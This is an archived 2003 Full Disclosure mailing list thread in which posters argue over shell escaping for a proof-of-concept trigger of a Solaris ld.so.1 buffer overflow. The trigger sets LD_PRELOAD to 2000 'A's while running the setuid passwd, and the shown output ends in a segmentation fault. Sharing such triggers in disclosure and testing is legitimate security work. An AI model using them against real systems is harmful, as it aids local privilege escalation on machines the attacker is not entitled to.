Full Disclosure mailing list archives

RE: Re: Fwd: Re: Solaris ld.so.1 buffer overflow
From: uidzer0 <uidzer0 () sptrm com>
Date: 31 Jul 2003 18:05:16 -0400

Paul, you are mistaken. Why are you trying to escape the backtick with a
'/' (forward slash)? Escapes are '\' (backslash). But nice try. But
since you must not have any nix boxes around, let me be the nice guy and
show you the output of your misguided command structure. And let's not
even go into why you would want to escape the perl command anyhow,
seeing how that totally defeats the purpose of this entire thread.

So, here we go.

Paul wants to escape perl. Sounds good, let's see what happens.

LD_PRELOAD=\`perl -e 'print "A"x2000'\` passwd
LD_PRELOAD=`perl: Command not found.

So now Paul wants to use his so-called escape character (/) to escape
just the trailing backtick. So here we go:

LD_PRELOAD=/`perl -e 'print "A"x2000'/` passwd
syntax error at -e line 1, at EOF
Execution of -e aborted due to compilation errors.
LD_PRELOAD=/: Command not found.

So, the correct way of doing this is exactly the way David posted
originally.

$ LD_PRELOAD=/`perl -e 'print "A"x2000'`/ passwd
ld.so.1: passwd: warning:
/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

... (bunch of A's)

AAAAAAAAAAAAAAAAAAAAAAAAAAA/: open failed: illegal insecure pathname
Segmentation Fault

Oh, and this was done on a Solaris 8 box.

peace

-0

On Thu, 2003-07-31 at 11:08, Schmehl, Paul L wrote:
-----Original Message-----
From: Jim Dew [mailto:jdew () yggdrasil ca] 
Sent: Wednesday, July 30, 2003 8:19 PM
To: Jouko Pynnonen
Cc: full-disclosure () lists netsys com
Subject: [Full-disclosure] Re: Fwd: Re: Solaris ld.so.1 buffer overflow


On Wed, Jul 30, 2003 at 07:49:28PM +0300, Jouko Pynnonen wrote:

On Wed, Jul 30, 2003 at 12:37:44PM -0400, Rukshin, David wrote:
Modify the command (you need to add a trailing slash) to be the 
following:

LD_PRELOAD=/`perl -e 'print "A"x2000'`/ passwd

and try it again.


This segfaults on Solaris 2.6.

Try moving the escape to *before* the backtick:
LD_PRELOAD=/`perl -e 'print "A"x2000'/` passwd

Paul Schmehl (pauls () utdallas edu)
Adjunct Information Security Officer
The University of Texas at Dallas
AVIEN Founding Member
http://www.utdallas.edu/~pauls/ 
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


